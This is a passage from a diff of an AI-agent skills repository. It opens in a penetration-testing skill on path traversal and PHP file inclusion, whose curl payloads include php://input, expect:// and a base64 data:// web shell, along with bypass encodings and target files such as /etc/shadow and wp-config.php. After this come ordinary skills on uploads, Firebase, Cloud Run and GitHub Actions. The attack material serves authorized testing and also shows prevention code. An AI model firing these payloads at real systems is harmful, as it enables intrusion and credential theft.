curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
|
||||
|
||||
# php://input - Execute POST data as PHP
|
||||
curl -X POST -d "<?php system('id'); ?>" \
|
||||
"http://target.com/page?file=php://input"
|
||||
|
||||
# data:// - Execute inline PHP
|
||||
curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
|
||||
|
||||
# expect:// - Execute system commands
|
||||
curl "http://target.com/page?file=expect://id"
|
||||
```
|
||||
|
||||
### Phase 9: Testing Methodology
|
||||
|
||||
Structured testing approach:
|
||||
|
||||
```bash
|
||||
# Step 1: Identify potential parameters
|
||||
# Look for file-related functionality
|
||||
|
||||
# Step 2: Test basic traversal
|
||||
../../../etc/passwd
|
||||
|
||||
# Step 3: Test encoding variations
|
||||
..%2F..%2F..%2Fetc%2Fpasswd
|
||||
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
|
||||
|
||||
# Step 4: Test bypass techniques
|
||||
....//....//....//etc/passwd
|
||||
..;/..;/..;/etc/passwd
|
||||
|
||||
# Step 5: Test absolute paths
|
||||
/etc/passwd
|
||||
|
||||
# Step 6: Test with null bytes (legacy)
|
||||
../../../etc/passwd%00.jpg
|
||||
|
||||
# Step 7: Attempt wrapper exploitation
|
||||
php://filter/convert.base64-encode/resource=index.php
|
||||
|
||||
# Step 8: Attempt log poisoning for RCE
|
||||
```
|
||||
|
||||
### Phase 10: Prevention Measures
|
||||
|
||||
Secure coding practices:
|
||||
|
||||
```php
|
||||
// PHP: Use basename() to strip paths
|
||||
$filename = basename($_GET['file']);
|
||||
$path = "/var/www/files/" . $filename;
|
||||
|
||||
// PHP: Validate against whitelist
|
||||
$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
|
||||
if (in_array($_GET['file'], $allowed)) {
|
||||
include("/var/www/files/" . $_GET['file']);
|
||||
}
|
||||
|
||||
// PHP: Canonicalize and verify base path
|
||||
$base = "/var/www/files/";
|
||||
$realBase = realpath($base);
|
||||
$userPath = $base . $_GET['file'];
|
||||
$realUserPath = realpath($userPath);
|
||||
|
||||
if ($realUserPath && strpos($realUserPath, $realBase) === 0) {
|
||||
include($realUserPath);
|
||||
}
|
||||
```
|
||||
|
||||
```python
|
||||
# Python: Use os.path.realpath() and validate
|
||||
import os
|
||||
|
||||
def safe_file_access(base_dir, filename):
|
||||
# Resolve to absolute path
|
||||
base = os.path.realpath(base_dir)
|
||||
file_path = os.path.realpath(os.path.join(base, filename))
|
||||
|
||||
# Verify file is within base directory
|
||||
if file_path.startswith(base):
|
||||
return open(file_path, 'r').read()
|
||||
else:
|
||||
raise Exception("Access denied")
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Common Payloads
|
||||
|
||||
| Payload | Target |
|
||||
|---------|--------|
|
||||
| `../../../etc/passwd` | Linux password file |
|
||||
| `..\..\..\..\windows\win.ini` | Windows INI file |
|
||||
| `....//....//....//etc/passwd` | Bypass simple filter |
|
||||
| `/etc/passwd` | Absolute path |
|
||||
| `php://filter/convert.base64-encode/resource=config.php` | Source code |
|
||||
|
||||
### Target Files
|
||||
|
||||
| OS | File | Purpose |
|
||||
|----|------|---------|
|
||||
| Linux | `/etc/passwd` | User accounts |
|
||||
| Linux | `/etc/shadow` | Password hashes |
|
||||
| Linux | `/proc/self/environ` | Environment vars |
|
||||
| Windows | `C:\windows\win.ini` | System config |
|
||||
| Windows | `C:\boot.ini` | Boot config |
|
||||
| Web | `wp-config.php` | WordPress DB creds |
|
||||
|
||||
### Encoding Variants
|
||||
|
||||
| Type | Example |
|
||||
|------|---------|
|
||||
| URL Encoding | `%2e%2e%2f` = `../` |
|
||||
| Double Encoding | `%252e%252e%252f` = `../` |
|
||||
| Unicode | `%c0%af` = `/` |
|
||||
| Null Byte | `%00` |
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Permission Restrictions
|
||||
- Cannot read files application user cannot access
|
||||
- Shadow file requires root privileges
|
||||
- Many files have restrictive permissions
|
||||
|
||||
### Application Restrictions
|
||||
- Extension validation may limit file types
|
||||
- Base path validation may restrict scope
|
||||
- WAF may block common payloads
|
||||
|
||||
### Testing Considerations
|
||||
- Respect authorized scope
|
||||
- Avoid accessing genuinely sensitive data
|
||||
- Document all successful access
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Problem | Solutions |
|
||||
|---------|-----------|
|
||||
| No response difference | Try encoding, blind traversal, different files |
|
||||
| Payload blocked | Use encoding variants, nested sequences, case variations |
|
||||
| Cannot escalate to RCE | Check logs, PHP wrappers, file upload, session poisoning |
|
||||
22
skills/file-uploads/SKILL.md
Normal file
22
skills/file-uploads/SKILL.md
Normal file
@@ -0,0 +1,22 @@
|
||||
---
|
||||
name: file-uploads
|
||||
description: "Expert at handling file uploads and cloud storage. Covers S3, Cloudflare R2, presigned URLs, multipart uploads, and image optimization. Knows how to handle large files without blocking. Use when: file upload, S3, R2, presigned URL, multipart."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# File Uploads & Storage
|
||||
|
||||
**Role**: File Upload Specialist
|
||||
|
||||
Careful about security and performance. Never trusts file
|
||||
extensions. Knows that large uploads need special handling.
|
||||
Prefers presigned URLs over server proxying.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Trusting client-provided file type | critical | # CHECK MAGIC BYTES |
|
||||
| No upload size restrictions | high | # SET SIZE LIMITS |
|
||||
| User-controlled filename allows path traversal | critical | # SANITIZE FILENAMES |
|
||||
| Presigned URL shared or cached incorrectly | medium | # CONTROL PRESIGNED URL DISTRIBUTION |
|
||||
56
skills/firebase/SKILL.md
Normal file
56
skills/firebase/SKILL.md
Normal file
@@ -0,0 +1,56 @@
|
||||
---
|
||||
name: firebase
|
||||
description: "Firebase gives you a complete backend in minutes - auth, database, storage, functions, hosting. But the ease of setup hides real complexity. Security rules are your last line of defense, and they're often wrong. Firestore queries are limited, and you learn this after you've designed your data model. This skill covers Firebase Authentication, Firestore, Realtime Database, Cloud Functions, Cloud Storage, and Firebase Hosting. Key insight: Firebase is optimized for read-heavy, denormalized data. I"
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Firebase
|
||||
|
||||
You're a developer who has shipped dozens of Firebase projects. You've seen the
|
||||
"easy" path lead to security breaches, runaway costs, and impossible migrations.
|
||||
You know Firebase is powerful, but you also know its sharp edges.
|
||||
|
||||
Your hard-won lessons: The team that skipped security rules got pwned. The team
|
||||
that designed Firestore like SQL couldn't query their data. The team that
|
||||
attached listeners to large collections got a $10k bill. You've learned from
|
||||
all of them.
|
||||
|
||||
You advocate for Firebase w
|
||||
|
||||
## Capabilities
|
||||
|
||||
- firebase-auth
|
||||
- firestore
|
||||
- firebase-realtime-database
|
||||
- firebase-cloud-functions
|
||||
- firebase-storage
|
||||
- firebase-hosting
|
||||
- firebase-security-rules
|
||||
- firebase-admin-sdk
|
||||
- firebase-emulators
|
||||
|
||||
## Patterns
|
||||
|
||||
### Modular SDK Import
|
||||
|
||||
Import only what you need for smaller bundles
|
||||
|
||||
### Security Rules Design
|
||||
|
||||
Secure your data with proper rules from day one
|
||||
|
||||
### Data Modeling for Queries
|
||||
|
||||
Design Firestore data structure around query patterns
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ No Security Rules
|
||||
|
||||
### ❌ Client-Side Admin Operations
|
||||
|
||||
### ❌ Listener on Large Collections
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `nextjs-app-router`, `react-patterns`, `authentication-oauth`, `stripe`
|
||||
288
skills/gcp-cloud-run/SKILL.md
Normal file
288
skills/gcp-cloud-run/SKILL.md
Normal file
@@ -0,0 +1,288 @@
|
||||
---
|
||||
name: gcp-cloud-run
|
||||
description: "Specialized skill for building production-ready serverless applications on GCP. Covers Cloud Run services (containerized), Cloud Run Functions (event-driven), cold start optimization, and event-driven architecture with Pub/Sub."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# GCP Cloud Run
|
||||
|
||||
## Patterns
|
||||
|
||||
### Cloud Run Service Pattern
|
||||
|
||||
Containerized web service on Cloud Run
|
||||
|
||||
**When to use**: ['Web applications and APIs', 'Need any runtime or library', 'Complex services with multiple endpoints', 'Stateless containerized workloads']
|
||||
|
||||
```javascript
|
||||
```dockerfile
|
||||
# Dockerfile - Multi-stage build for smaller image
|
||||
FROM node:20-slim AS builder
|
||||
WORKDIR /app
|
||||
COPY package*.json ./
|
||||
RUN npm ci --only=production
|
||||
|
||||
FROM node:20-slim
|
||||
WORKDIR /app
|
||||
|
||||
# Copy only production dependencies
|
||||
COPY --from=builder /app/node_modules ./node_modules
|
||||
COPY src ./src
|
||||
COPY package.json ./
|
||||
|
||||
# Cloud Run uses PORT env variable
|
||||
ENV PORT=8080
|
||||
EXPOSE 8080
|
||||
|
||||
# Run as non-root user
|
||||
USER node
|
||||
|
||||
CMD ["node", "src/index.js"]
|
||||
```
|
||||
|
||||
```javascript
|
||||
// src/index.js
|
||||
const express = require('express');
|
||||
const app = express();
|
||||
|
||||
app.use(express.json());
|
||||
|
||||
// Health check endpoint
|
||||
app.get('/health', (req, res) => {
|
||||
res.status(200).send('OK');
|
||||
});
|
||||
|
||||
// API routes
|
||||
app.get('/api/items/:id', async (req, res) => {
|
||||
try {
|
||||
const item = await getItem(req.params.id);
|
||||
res.json(item);
|
||||
} catch (error) {
|
||||
console.error('Error:', error);
|
||||
res.status(500).json({ error: 'Internal server error' });
|
||||
}
|
||||
});
|
||||
|
||||
// Graceful shutdown
|
||||
process.on('SIGTERM', () => {
|
||||
console.log('SIGTERM received, shutting down gracefully');
|
||||
server.close(() => {
|
||||
console.log('Server closed');
|
||||
process.exit(0);
|
||||
});
|
||||
});
|
||||
|
||||
const PORT = process.env.PORT || 8080;
|
||||
const server = app.listen(PORT, () => {
|
||||
console.log(`Server listening on port ${PORT}`);
|
||||
});
|
||||
```
|
||||
|
||||
```yaml
|
||||
# cloudbuild.yaml
|
||||
steps:
|
||||
# Build the container image
|
||||
- name: 'gcr.io/cloud-builders/docker'
|
||||
args: ['build', '-t', 'gcr.io/$PROJECT_ID/my-service:$COMMIT_SHA', '.']
|
||||
|
||||
# Push the container image
|
||||
- name: 'gcr.io/cloud-builders/docker'
|
||||
args: ['push', 'gcr.io/$PROJECT_ID/my-service:$COMMIT_SHA']
|
||||
|
||||
# Deploy to Cloud Run
|
||||
- name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
|
||||
entrypoint: gcloud
|
||||
args:
|
||||
- 'run'
|
||||
- 'deploy'
|
||||
- 'my-service'
|
||||
- '--image=gcr.io/$PROJECT_ID/my-service:$COMMIT_SHA'
|
||||
- '--region=us-central1'
|
||||
- '--platform=managed'
|
||||
- '--allow-unauthenticated'
|
||||
- '--memory=512Mi'
|
||||
- '--cpu=1'
|
||||
- '--min-instances=1'
|
||||
- '--max-instances=100'
|
||||
|
||||
```
|
||||
|
||||
### Cloud Run Functions Pattern
|
||||
|
||||
Event-driven functions (formerly Cloud Functions)
|
||||
|
||||
**When to use**: ['Simple event handlers', 'Pub/Sub message processing', 'Cloud Storage triggers', 'HTTP webhooks']
|
||||
|
||||
```javascript
|
||||
```javascript
|
||||
// HTTP Function
|
||||
// index.js
|
||||
const functions = require('@google-cloud/functions-framework');
|
||||
|
||||
functions.http('helloHttp', (req, res) => {
|
||||
const name = req.query.name || req.body.name || 'World';
|
||||
res.send(`Hello, ${name}!`);
|
||||
});
|
||||
```
|
||||
|
||||
```javascript
|
||||
// Pub/Sub Function
|
||||
const functions = require('@google-cloud/functions-framework');
|
||||
|
||||
functions.cloudEvent('processPubSub', (cloudEvent) => {
|
||||
// Decode Pub/Sub message
|
||||
const message = cloudEvent.data.message;
|
||||
const data = message.data
|
||||
? JSON.parse(Buffer.from(message.data, 'base64').toString())
|
||||
: {};
|
||||
|
||||
console.log('Received message:', data);
|
||||
|
||||
// Process message
|
||||
processMessage(data);
|
||||
});
|
||||
```
|
||||
|
||||
```javascript
|
||||
// Cloud Storage Function
|
||||
const functions = require('@google-cloud/functions-framework');
|
||||
|
||||
functions.cloudEvent('processStorageEvent', async (cloudEvent) => {
|
||||
const file = cloudEvent.data;
|
||||
|
||||
console.log(`Event: ${cloudEvent.type}`);
|
||||
console.log(`Bucket: ${file.bucket}`);
|
||||
console.log(`File: ${file.name}`);
|
||||
|
||||
if (cloudEvent.type === 'google.cloud.storage.object.v1.finalized') {
|
||||
await processUploadedFile(file.bucket, file.name);
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
```bash
|
||||
# Deploy HTTP function
|
||||
gcloud functions deploy hello-http \
|
||||
--gen2 \
|
||||
--runtime nodejs20 \
|
||||
--trigger-http \
|
||||
--allow-unauthenticated \
|
||||
--region us-central1
|
||||
|
||||
# Deploy Pub/Sub function
|
||||
gcloud functions deploy process-messages \
|
||||
--gen2 \
|
||||
--runtime nodejs20 \
|
||||
--trigger-topic my-topic \
|
||||
--region us-central1
|
||||
|
||||
# Deploy Cloud Storage function
|
||||
gcloud functions deploy process-uploads \
|
||||
--gen2 \
|
||||
--runtime nodejs20 \
|
||||
--trigger-event-filters="type=google.cloud.storage.object.v1.finalized" \
|
||||
--trigger-event-filters="bucket=my-bucket" \
|
||||
--region us-central1
|
||||
```
|
||||
```
|
||||
|
||||
### Cold Start Optimization Pattern
|
||||
|
||||
Minimize cold start latency for Cloud Run
|
||||
|
||||
**When to use**: ['Latency-sensitive applications', 'User-facing APIs', 'High-traffic services']
|
||||
|
||||
```javascript
|
||||
## 1. Enable Startup CPU Boost
|
||||
|
||||
```bash
|
||||
gcloud run deploy my-service \
|
||||
--cpu-boost \
|
||||
--region us-central1
|
||||
```
|
||||
|
||||
## 2. Set Minimum Instances
|
||||
|
||||
```bash
|
||||
gcloud run deploy my-service \
|
||||
--min-instances 1 \
|
||||
--region us-central1
|
||||
```
|
||||
|
||||
## 3. Optimize Container Image
|
||||
|
||||
```dockerfile
|
||||
# Use distroless for minimal image
|
||||
FROM node:20-slim AS builder
|
||||
WORKDIR /app
|
||||
COPY package*.json ./
|
||||
RUN npm ci --only=production
|
||||
|
||||
FROM gcr.io/distroless/nodejs20-debian12
|
||||
WORKDIR /app
|
||||
COPY --from=builder /app/node_modules ./node_modules
|
||||
COPY src ./src
|
||||
CMD ["src/index.js"]
|
||||
```
|
||||
|
||||
## 4. Lazy Initialize Heavy Dependencies
|
||||
|
||||
```javascript
|
||||
// Lazy load heavy libraries
|
||||
let bigQueryClient = null;
|
||||
|
||||
function getBigQueryClient() {
|
||||
if (!bigQueryClient) {
|
||||
const { BigQuery } = require('@google-cloud/bigquery');
|
||||
bigQueryClient = new BigQuery();
|
||||
}
|
||||
return bigQueryClient;
|
||||
}
|
||||
|
||||
// Only initialize when needed
|
||||
app.get('/api/analytics', async (req, res) => {
|
||||
const client = getBigQueryClient();
|
||||
const results = await client.query({...});
|
||||
res.json(results);
|
||||
});
|
||||
```
|
||||
|
||||
## 5. Increase Memory (More CPU)
|
||||
|
||||
```bash
|
||||
# Higher memory = more CPU during startup
|
||||
gcloud run deploy my-service \
|
||||
--memory 1Gi \
|
||||
--cpu 2 \
|
||||
--region us-central1
|
||||
```
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ CPU-Intensive Work Without Concurrency=1
|
||||
|
||||
**Why bad**: CPU is shared across concurrent requests. CPU-bound work
|
||||
will starve other requests, causing timeouts.
|
||||
|
||||
### ❌ Writing Large Files to /tmp
|
||||
|
||||
**Why bad**: /tmp is an in-memory filesystem. Large files consume
|
||||
your memory allocation and can cause OOM errors.
|
||||
|
||||
### ❌ Long-Running Background Tasks
|
||||
|
||||
**Why bad**: Cloud Run throttles CPU to near-zero when not handling
|
||||
requests. Background tasks will be extremely slow or stall.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | high | ## Calculate memory including /tmp usage |
|
||||
| Issue | high | ## Set appropriate concurrency |
|
||||
| Issue | high | ## Enable CPU always allocated |
|
||||
| Issue | medium | ## Configure connection pool with keep-alive |
|
||||
| Issue | high | ## Enable startup CPU boost |
|
||||
| Issue | medium | ## Explicitly set execution environment |
|
||||
| Issue | medium | ## Set consistent timeouts |
|
||||
846
skills/github-workflow-automation/SKILL.md
Normal file
846
skills/github-workflow-automation/SKILL.md
Normal file
@@ -0,0 +1,846 @@
|
||||
---
|
||||
name: github-workflow-automation
|
||||
description: "Automate GitHub workflows with AI assistance. Includes PR reviews, issue triage, CI/CD integration, and Git operations. Use when automating GitHub workflows, setting up PR review automation, creating GitHub Actions, or triaging issues."
|
||||
---
|
||||
|
||||
# 🔧 GitHub Workflow Automation
|
||||
|
||||
> Patterns for automating GitHub workflows with AI assistance, inspired by [Gemini CLI](https://github.com/google-gemini/gemini-cli) and modern DevOps practices.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when:
|
||||
|
||||
- Automating PR reviews with AI
|
||||
- Setting up issue triage automation
|
||||
- Creating GitHub Actions workflows
|
||||
- Integrating AI into CI/CD pipelines
|
||||
- Automating Git operations (rebases, cherry-picks)
|
||||
|
||||
---
|
||||
|
||||
## 1. Automated PR Review
|
||||
|
||||
### 1.1 PR Review Action
|
||||
|
||||
```yaml
|
||||
# .github/workflows/ai-review.yml
|
||||
name: AI Code Review
|
||||
|
||||
on:
|
||||
pull_request:
|
||||
types: [opened, synchronize]
|
||||
|
||||
jobs:
|
||||
review:
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: read
|
||||
pull-requests: write
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Get changed files
|
||||
id: changed
|
||||
run: |
|
||||
files=$(git diff --name-only origin/${{ github.base_ref }}...HEAD)
|
||||
echo "files<<EOF" >> $GITHUB_OUTPUT
|
||||
echo "$files" >> $GITHUB_OUTPUT
|
||||
echo "EOF" >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Get diff
|
||||
id: diff
|
||||
run: |
|
||||
diff=$(git diff origin/${{ github.base_ref }}...HEAD)
|
||||
echo "diff<<EOF" >> $GITHUB_OUTPUT
|
||||
echo "$diff" >> $GITHUB_OUTPUT
|
||||
echo "EOF" >> $GITHUB_OUTPUT
|
||||
|
||||
- name: AI Review
|
||||
uses: actions/github-script@v7
|
||||
with:
|
||||
script: |
|
||||
const { Anthropic } = require('@anthropic-ai/sdk');
|
||||
const client = new Anthropic({ apiKey: process.env.ANTHROPIC_API_KEY });
|
||||
|
||||
const response = await client.messages.create({
|
||||
model: "claude-3-sonnet-20240229",
|
||||
max_tokens: 4096,
|
||||
messages: [{
|
||||
role: "user",
|
||||
content: `Review this PR diff and provide feedback:
|
||||
|
||||
Changed files: ${{ steps.changed.outputs.files }}
|
||||
|
||||
Diff:
|
||||
${{ steps.diff.outputs.diff }}
|
||||
|
||||
Provide:
|
||||
1. Summary of changes
|
||||
2. Potential issues or bugs
|
||||
3. Suggestions for improvement
|
||||
4. Security concerns if any
|
||||
|
||||
Format as GitHub markdown.`
|
||||
}]
|
||||
});
|
||||
|
||||
await github.rest.pulls.createReview({
|
||||
owner: context.repo.owner,
|
||||
repo: context.repo.repo,
|
||||
pull_number: context.issue.number,
|
||||
body: response.content[0].text,
|
||||
event: 'COMMENT'
|
||||
});
|
||||
env:
|
||||
ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
|
||||
```
|
||||
|
||||
### 1.2 Review Comment Patterns
|
||||
|
||||
````markdown
|
||||
# AI Review Structure
|
||||
|
||||
## 📋 Summary
|
||||
|
||||
Brief description of what this PR does.
|
||||
|
||||
## ✅ What looks good
|
||||
|
||||
- Well-structured code
|
||||
- Good test coverage
|
||||
- Clear naming conventions
|
||||
|
||||
## ⚠️ Potential Issues
|
||||
|
||||
1. **Line 42**: Possible null pointer exception
|
||||
```javascript
|
||||
// Current
|
||||
user.profile.name;
|
||||
// Suggested
|
||||
user?.profile?.name ?? "Unknown";
|
||||
```
|
||||
````
|
||||
|
||||
2. **Line 78**: Consider error handling
|
||||
```javascript
|
||||
// Add try-catch or .catch()
|
||||
```
|
||||
|
||||
## 💡 Suggestions
|
||||
|
||||
- Consider extracting the validation logic into a separate function
|
||||
- Add JSDoc comments for public methods
|
||||
|
||||
## 🔒 Security Notes
|
||||
|
||||
- No sensitive data exposure detected
|
||||
- API key handling looks correct
|
||||
|
||||
````
|
||||
|
||||
### 1.3 Focused Reviews
|
||||
|
||||
```yaml
|
||||
# Review only specific file types
|
||||
- name: Filter code files
|
||||
run: |
|
||||
files=$(git diff --name-only origin/${{ github.base_ref }}...HEAD | \
|
||||
grep -E '\.(ts|tsx|js|jsx|py|go)$' || true)
|
||||
echo "code_files=$files" >> $GITHUB_OUTPUT
|
||||
|
||||
# Review with context
|
||||
- name: AI Review with context
|
||||
run: |
|
||||
# Include relevant context files
|
||||
context=""
|
||||
for file in ${{ steps.changed.outputs.files }}; do
|
||||
if [[ -f "$file" ]]; then
|
||||
context+="=== $file ===\n$(cat $file)\n\n"
|
||||
fi
|
||||
done
|
||||
|
||||
# Send to AI with full file context
|
||||
````
|
||||
|
||||
---
|
||||
|
||||
## 2. Issue Triage Automation
|
||||
|
||||
### 2.1 Auto-label Issues
|
||||
|
||||
```yaml
|
||||
# .github/workflows/issue-triage.yml
|
||||
name: Issue Triage
|
||||
|
||||
on:
|
||||
issues:
|
||||
types: [opened]
|
||||
|
||||
jobs:
|
||||
triage:
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
issues: write
|
||||
|
||||
steps:
|
||||
- name: Analyze issue
|
||||
uses: actions/github-script@v7
|
||||
with:
|
||||
script: |
|
||||
const issue = context.payload.issue;
|
||||
|
||||
// Call AI to analyze
|
||||
const analysis = await analyzeIssue(issue.title, issue.body);
|
||||
|
||||
// Apply labels
|
||||
const labels = [];
|
||||
|
||||
if (analysis.type === 'bug') {
|
||||
labels.push('bug');
|
||||
if (analysis.severity === 'high') labels.push('priority: high');
|
||||
} else if (analysis.type === 'feature') {
|
||||
labels.push('enhancement');
|
||||
} else if (analysis.type === 'question') {
|
||||
labels.push('question');
|
||||
}
|
||||
|
||||
if (analysis.area) {
|
||||
labels.push(`area: ${analysis.area}`);
|
||||
}
|
||||
|
||||
await github.rest.issues.addLabels({
|
||||
owner: context.repo.owner,
|
||||
repo: context.repo.repo,
|
||||
issue_number: issue.number,
|
||||
labels: labels
|
||||
});
|
||||
|
||||
// Add initial response
|
||||
if (analysis.type === 'bug' && !analysis.hasReproSteps) {
|
||||
await github.rest.issues.createComment({
|
||||
owner: context.repo.owner,
|
||||
repo: context.repo.repo,
|
||||
issue_number: issue.number,
|
||||
body: `Thanks for reporting this issue!
|
||||
|
||||
To help us investigate, could you please provide:
|
||||
- Steps to reproduce the issue
|
||||
- Expected behavior
|
||||
- Actual behavior
|
||||
- Environment (OS, version, etc.)
|
||||
|
||||
This will help us resolve your issue faster. 🙏`
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
### 2.2 Issue Analysis Prompt
|
||||
|
||||
```typescript
|
||||
const TRIAGE_PROMPT = `
|
||||
Analyze this GitHub issue and classify it:
|
||||
|
||||
Title: {title}
|
||||
Body: {body}
|
||||
|
||||
Return JSON with:
|
||||
{
|
||||
"type": "bug" | "feature" | "question" | "docs" | "other",
|
||||
"severity": "low" | "medium" | "high" | "critical",
|
||||
"area": "frontend" | "backend" | "api" | "docs" | "ci" | "other",
|
||||
"summary": "one-line summary",
|
||||
"hasReproSteps": boolean,
|
||||
"isFirstContribution": boolean,
|
||||
"suggestedLabels": ["label1", "label2"],
|
||||
"suggestedAssignees": ["username"] // based on area expertise
|
||||
}
|
||||
`;
|
||||
```
|
||||
|
||||
### 2.3 Stale Issue Management
|
||||
|
||||
```yaml
|
||||
# .github/workflows/stale.yml
|
||||
name: Manage Stale Issues
|
||||
|
||||
on:
|
||||
schedule:
|
||||
- cron: "0 0 * * *" # Daily
|
||||
|
||||
jobs:
|
||||
stale:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/stale@v9
|
||||
with:
|
||||
stale-issue-message: |
|
||||
This issue has been automatically marked as stale because it has not had
|
||||
recent activity. It will be closed in 14 days if no further activity occurs.
|
||||
|
||||
If this issue is still relevant:
|
||||
- Add a comment with an update
|
||||
- Remove the `stale` label
|
||||
|
||||
Thank you for your contributions! 🙏
|
||||
|
||||
stale-pr-message: |
|
||||
This PR has been automatically marked as stale. Please update it or it
|
||||
will be closed in 14 days.
|
||||
|
||||
days-before-stale: 60
|
||||
days-before-close: 14
|
||||
stale-issue-label: "stale"
|
||||
stale-pr-label: "stale"
|
||||
exempt-issue-labels: "pinned,security,in-progress"
|
||||
exempt-pr-labels: "pinned,security"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. CI/CD Integration
|
||||
|
||||
### 3.1 Smart Test Selection
|
||||
|
||||
```yaml
|
||||
# .github/workflows/smart-tests.yml
|
||||
name: Smart Test Selection
|
||||
|
||||
on:
|
||||
pull_request:
|
||||
|
||||
jobs:
|
||||
analyze:
|
||||
runs-on: ubuntu-latest
|
||||
outputs:
|
||||
test_suites: ${{ steps.analyze.outputs.suites }}
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Analyze changes
|
||||
id: analyze
|
||||
run: |
|
||||
# Get changed files
|
||||
changed=$(git diff --name-only origin/${{ github.base_ref }}...HEAD)
|
||||
|
||||
# Determine which test suites to run
|
||||
suites="[]"
|
||||
|
||||
if echo "$changed" | grep -q "^src/api/"; then
|
||||
suites=$(echo $suites | jq '. + ["api"]')
|
||||
fi
|
||||
|
||||
if echo "$changed" | grep -q "^src/frontend/"; then
|
||||
suites=$(echo $suites | jq '. + ["frontend"]')
|
||||
fi
|
||||
|
||||
if echo "$changed" | grep -q "^src/database/"; then
|
||||
suites=$(echo $suites | jq '. + ["database", "api"]')
|
||||
fi
|
||||
|
||||
# If nothing specific, run all
|
||||
if [ "$suites" = "[]" ]; then
|
||||
suites='["all"]'
|
||||
fi
|
||||
|
||||
echo "suites=$suites" >> $GITHUB_OUTPUT
|
||||
|
||||
test:
|
||||
needs: analyze
|
||||
runs-on: ubuntu-latest
|
||||
strategy:
|
||||
matrix:
|
||||
suite: ${{ fromJson(needs.analyze.outputs.test_suites) }}
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
|
||||
- name: Run tests
|
||||
run: |
|
||||
if [ "${{ matrix.suite }}" = "all" ]; then
|
||||
npm test
|
||||
else
|
||||
npm test -- --suite ${{ matrix.suite }}
|
||||
fi
|
||||
```
|
||||
|
||||
### 3.2 Deployment with AI Validation
|
||||
|
||||
```yaml
|
||||
# .github/workflows/deploy.yml
|
||||
name: Deploy with AI Validation
|
||||
|
||||
on:
|
||||
push:
|
||||
branches: [main]
|
||||
|
||||
jobs:
|
||||
validate:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
|
||||
- name: Get deployment changes
|
||||
id: changes
|
||||
run: |
|
||||
# Get commits since last deployment
|
||||
last_deploy=$(git describe --tags --abbrev=0 2>/dev/null || echo "")
|
||||
if [ -n "$last_deploy" ]; then
|
||||
changes=$(git log --oneline $last_deploy..HEAD)
|
||||
else
|
||||
changes=$(git log --oneline -10)
|
||||
fi
|
||||
echo "changes<<EOF" >> $GITHUB_OUTPUT
|
||||
echo "$changes" >> $GITHUB_OUTPUT
|
||||
echo "EOF" >> $GITHUB_OUTPUT
|
||||
|
||||
- name: AI Risk Assessment
|
||||
id: assess
|
||||
uses: actions/github-script@v7
|
||||
with:
|
||||
script: |
|
||||
// Analyze changes for deployment risk
|
||||
const prompt = `
|
||||
Analyze these changes for deployment risk:
|
||||
|
||||
${process.env.CHANGES}
|
||||
|
||||
Return JSON:
|
||||
{
|
||||
"riskLevel": "low" | "medium" | "high",
|
||||
"concerns": ["concern1", "concern2"],
|
||||
"recommendations": ["rec1", "rec2"],
|
||||
"requiresManualApproval": boolean
|
||||
}
|
||||
`;
|
||||
|
||||
// Call AI and parse response
|
||||
const analysis = await callAI(prompt);
|
||||
|
||||
if (analysis.riskLevel === 'high') {
|
||||
core.setFailed('High-risk deployment detected. Manual review required.');
|
||||
}
|
||||
|
||||
return analysis;
|
||||
env:
|
||||
CHANGES: ${{ steps.changes.outputs.changes }}
|
||||
|
||||
deploy:
|
||||
needs: validate
|
||||
runs-on: ubuntu-latest
|
||||
environment: production
|
||||
steps:
|
||||
- name: Deploy
|
||||
run: |
|
||||
echo "Deploying to production..."
|
||||
# Deployment commands here
|
||||
```
|
||||
|
||||
### 3.3 Rollback Automation
|
||||
|
||||
```yaml
|
||||
# .github/workflows/rollback.yml
|
||||
name: Automated Rollback
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
inputs:
|
||||
reason:
|
||||
description: "Reason for rollback"
|
||||
required: true
|
||||
|
||||
jobs:
|
||||
rollback:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Find last stable version
|
||||
id: stable
|
||||
run: |
|
||||
# Find last successful deployment
|
||||
stable=$(git tag -l 'v*' --sort=-version:refname | head -1)
|
||||
